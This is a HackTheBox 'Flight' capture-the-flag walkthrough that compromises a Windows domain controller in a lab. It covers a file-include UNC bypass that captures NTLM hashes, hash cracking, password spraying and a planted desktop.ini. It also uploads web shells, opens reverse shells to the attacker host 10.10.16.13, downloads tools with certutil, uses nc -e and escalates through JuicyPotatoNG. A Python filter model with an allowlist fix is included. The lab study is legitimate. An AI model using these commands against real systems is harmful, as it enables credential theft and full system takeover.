# [HackTheBox] Flight
![](https://i.imgur.com/vXpBdHO.png)
## Foothold
Checking which ports are open on the target:
```bash
nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49697/tcp open unknown
49709/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
```
Next, fuzz for virtual hosts under `flight.htb`; `--hl 154` hides responses with 154 lines, the size of the default page:
```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://flight.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"
```
Having found the `school` vhost, we enumerate its directories:
```bash
dirsearch -u http://school.flight.htb
_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt
Target: http://school.flight.htb/
```
But I notice this:
![](https://i.imgur.com/xkfcrqB.png)
The `view` parameter looks like a file include, so we test it with `../../../../etc/passwd` and look at the response. (The host is Windows, as the XAMPP paths in the source below confirm, so even an unfiltered traversal would need a Windows target such as `windows/win.ini`.)
![](https://i.imgur.com/970WrHI.png)
To see exactly what the filter does, we read the source of `index.php`:
```php
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if(isset($_GET['view'])){
    $file=$_GET['view'];
    // Deny-list: blocks traversal ("..") and php://filter, plus backslashes,
    // .htaccess and .shtml. Everything else reaches file_get_contents() unchanged.
    if ((strpos(urldecode($_GET['view']),'..')!==false)||
        (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
        (strpos(urldecode($_GET['view']),'\\')!==false)||
        (strpos(urldecode($_GET['view']),'htaccess')!==false)||
        (strpos(urldecode($_GET['view']),'.shtml')!==false)
    ){
        echo "<h1>Suspicious Activity Blocked!";
        echo "<h3>Incident will be reported</h3>\r\n";
    }else{
        // No allowlist and no realpath() check: a forward-slash UNC path
        // (//host/share) contains none of the blocked substrings.
        echo file_get_contents($_GET['view']);
    }
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
```
Bypassing this filter for a classic LFI is hard: the `..` check rules out traversal and the `filter` check rules out `php://filter` wrappers. But `file_get_contents()` on Windows also accepts UNC paths, and the filter only rejects the backslash form (`\\host\share`); the forward-slash form `//<attacker-ip>/<share>` passes untouched. Pointing `view` at a share on our machine makes the web server open an SMB connection to us and authenticate with the account Apache runs as, so we can capture its NetNTLMv2 response with Responder:
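To make the gap in that deny-list concrete, here is a Python model of the filter (an added example, not code from the original write-up or from the box) next to the allowlist check that would close it. The Windows web root comes from the page's `index.php`; the set of allowed page names is an assumption for the example.

```python
import ntpath
from urllib.parse import unquote

# Web root hard-coded in the page's index.php
WEBROOT = r"C:\xampp\htdocs\school.flight.htb"

# Allowlist of pages the site is meant to serve. home.html is from the page;
# the other names are assumptions for this example.
ALLOWED_PAGES = {"home.html", "about.html", "blog.html"}


def php_get_value(raw_query_value: str) -> str:
    """PHP URL-decodes the query string once when it builds $_GET."""
    return unquote(raw_query_value)


def original_filter_blocks(view: str) -> bool:
    """Python model of the deny-list in the page's index.php.

    `view` is $_GET['view']; the PHP code urldecode()s it a second time
    before every strpos() check, which is why double encoding does not help.
    """
    decoded = unquote(view)
    return (
        ".." in decoded
        or "filter" in decoded.lower()
        or "\\" in decoded
        or "htaccess" in decoded
        or ".shtml" in decoded
    )


def is_unc_path(path: str) -> bool:
    """Windows accepts //host/share as well as \\host\share for UNC paths.
    Only the backslash form is caught by the filter above."""
    return path.startswith("//") or path.startswith("\\\\")


def classify(raw_query_value: str) -> str:
    """What the vulnerable page does with a given ?view= value."""
    view = php_get_value(raw_query_value)
    if original_filter_blocks(view):
        return "blocked"
    if is_unc_path(view):
        return "smb-callback"      # file_get_contents() authenticates to that host
    return "read:" + view          # local read, relative to the script's directory


def hardened_resolve(raw_query_value: str, webroot: str = WEBROOT):
    """Allowlist replacement for the deny-list: only bare, known filenames.

    Returns the path to serve, or None to reject. Anything with a separator,
    a drive letter or a UNC prefix can never match an allowlisted name.
    """
    name = php_get_value(raw_query_value)
    if name not in ALLOWED_PAGES:
        return None
    return ntpath.join(webroot, name)


if __name__ == "__main__":
    for payload in [
        "../../../../etc/passwd",
        "%252e%252e/%252e%252e/windows/win.ini",   # double-encoded traversal
        "php://filter/convert.base64-encode/resource=index.php",
        r"\\10.10.16.13\test",
        "//10.10.16.13/test",
        "index.php",
        "home.html",
    ]:
        print(f"{payload:55} -> {classify(payload):18} | hardened: {hardened_resolve(payload)}")
```

Run it and the one payload that reaches `file_get_contents()` with a remote target is the forward-slash UNC path; everything the author of the filter thought of (traversal, double encoding, `php://filter`, backslash UNC) is blocked, and the allowlist version rejects all of them plus `index.php` itself.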
```bash
# Request from the browser (Responder's IP is 10.10.16.13):
http://school.flight.htb/index.php?view=//10.10.16.13/test
#Attacker's machine:
responder -I tun0 -wPv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Responder IPv6 [dead:beef:4::100b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-UJ4VMU7XFG1]
Responder Domain Name [R924.LOCAL]
Responder DCE-RPC Port [47241]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:90b54e5073440f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
```
Crack the NetNTLMv2 response with hashcat (mode 5600; `--show` prints the recovered password):
```bash
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935: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
:S*******13
```
## Enum the SMB services:
With the `svc_apache` credentials, list the SMB shares:
```bash
smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
Users Disk
Web Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
## AD Enum:
Enumerate the domain users over SMB with the credential we have (`G0` is the DC's hostname):
```bash
crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB flight.htb 445 G0 flight.htb\O.Possum badpwdcount: 0 desc: Helpdesk
SMB flight.htb 445 G0 flight.htb\svc_apache badpwdcount: 0 desc: Service Apache web
SMB flight.htb 445 G0 flight.htb\V.Stevens badpwdcount: 0 desc: Secretary
SMB flight.htb 445 G0 flight.htb\D.Truff badpwdcount: 0 desc: Project Manager
SMB flight.htb 445 G0 flight.htb\I.Francis badpwdcount: 0 desc: Nobody knows why he's here
SMB flight.htb 445 G0 flight.htb\W.Walker badpwdcount: 0 desc: Payroll officer
SMB flight.htb 445 G0 flight.htb\C.Bum badpwdcount: 1 desc: Senior Web Developer
SMB flight.htb 445 G0 flight.htb\M.Gold badpwdcount: 0 desc: Sysadmin
SMB flight.htb 445 G0 flight.htb\L.Kein badpwdcount: 0 desc: Penetration tester
SMB flight.htb 445 G0 flight.htb\G.Lors badpwdcount: 0 desc: Sales manager
SMB flight.htb 445 G0 flight.htb\R.Cold badpwdcount: 0 desc: HR Assistant
SMB flight.htb 445 G0 flight.htb\S.Moon badpwdcount: 0 desc: Junion Web Developer
```
Spraying the same password across that user list (`--continue-on-success` keeps going after the first hit; a single attempt per account keeps us clear of lockout thresholds) shows that `S.Moon` reuses `svc_apache`'s password:
```bash
crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S*********3
SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE
SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S*********3
```
## User: C.bum
Using `impacket-psexec` as `s.moon` we learn which share is writable: `Shared`. The `.exe` upload into it is denied, though, so the share evidently restricts which kinds of files may be written:
```bash
impacket-psexec flight.htb/s.moon@g0.flight.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
```
Plain files can still be uploaded to `Shared`, so we use a `desktop.ini` whose icon points at our SMB server (see https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini; `<ip>` is the attacker's IP, 10.10.16.13 here). Explorer only parses `desktop.ini` when it renders the folder, so this needs someone on the target to browse the share; when that happens it fetches the icon over SMB and authenticates to us:
```ini
[.ShellClassInfo]
IconResource=\\<ip>\test
```
After creating `desktop.ini`, upload it to `Shared` as `s.moon`:
```bash
smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
```
On the attacker's machine Responder is still listening. After a short wait, something on the target browses the folder and authenticates to our SMB server as `c.bum`:
```bash
responder -I tun0 -wPv
# banner and option listing omitted; identical to the first run
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:c69dd0be9d4ce77f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
```
Crack c.bum's response the same way:
```bash
hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6: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
:T*************4
```
With c.bum's password we can also access the `Web` share:
```bash
smbclient //flight.htb/Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
```
It contains both web roots. I upload p0wny-shell (https://github.com/flozz/p0wny-shell) into the `flight.htb` root as `test.php`:
```bash
smb: \> ls
. D 0 Tue Dec 13 09:57:01 2022
.. D 0 Tue Dec 13 09:57:01 2022
flight.htb D 0 Tue Dec 13 09:57:01 2022
school.flight.htb D 0 Tue Dec 13 09:57:01 2022
5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>
```
Requesting `test.php` gives the web shell; from it I launch a reverse shell (payload generated with revshells.com), which runs as `svc_apache`:
![](https://i.imgur.com/zUBnbtC.png)
## C.bum Session:
We have c.bum's password, so we spawn a shell as c.bum with RunasCs (https://github.com/antonioCoco/RunasCs/tree/master), uploaded here as `test.exe`, sending a reverse PowerShell to our listener on port 9003:
```bash
PS C:\Users\svc_apache\Desktop> .\test.exe c.bum T*************4 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
```
`user.txt` is readable from that c.bum shell.
## P.E
From the `svc_apache` shell I check which ports are listening on the host and notice 8000, which did not appear in the external nmap scan (so it is most likely firewalled). I forward it to the attacker's machine with chisel:
```bash
PS C:\xampp\htdocs\flight.htb> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
```
Pivoting with chisel (start the server on the attacker's machine first; `R:8000:127.0.0.1:8000` makes port 8000 on the attacker forward to 127.0.0.1:8000 on the target):
```bash
# Attacker's machine (server):
chisel server --reverse -p 9999
# Target (client):
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000
```
Browsing to http://127.0.0.1:8000 on the attacker's machine shows a site built with ASP.NET, so an `.aspx` web shell should execute there if we can write it into the IIS site root, `C:\inetpub\development\`. Files dropped in the web root tend to be removed quickly, so upload the shell somewhere else first and copy it into place (re-copying if it disappears):
```bash
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
```
Requesting the `.aspx` file then gives a reverse shell as `iis apppool\defaultapppool`:
![](https://i.imgur.com/KLasfgL.png)
## Administrator
Checking the app pool identity's privileges:
```bash
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
`SeImpersonatePrivilege` is enabled for the app pool identity, which is the precondition for the Potato family of token-impersonation attacks (see https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens). I use JuicyPotatoNG (https://github.com/antonioCoco/JuicyPotatoNG). First, download `nc.exe` and JuicyPotatoNG (renamed `test.exe`) into `c:\users\c.bum\desktop`, then loosen their ACLs so the app pool account can read and execute them:
```bash
certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe
icacls nc.exe /grant Users:F
icacls test.exe /grant Users:F
```
From the `iis apppool\defaultapppool` shell, run JuicyPotatoNG with `-t *` (try both CreateProcessWithTokenW and CreateProcessAsUserW), using nc as the payload so the resulting SYSTEM shell connects back to us on port 9005:
```bash
c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"
```
Result:
![](https://i.imgur.com/J5ErEZ6.png)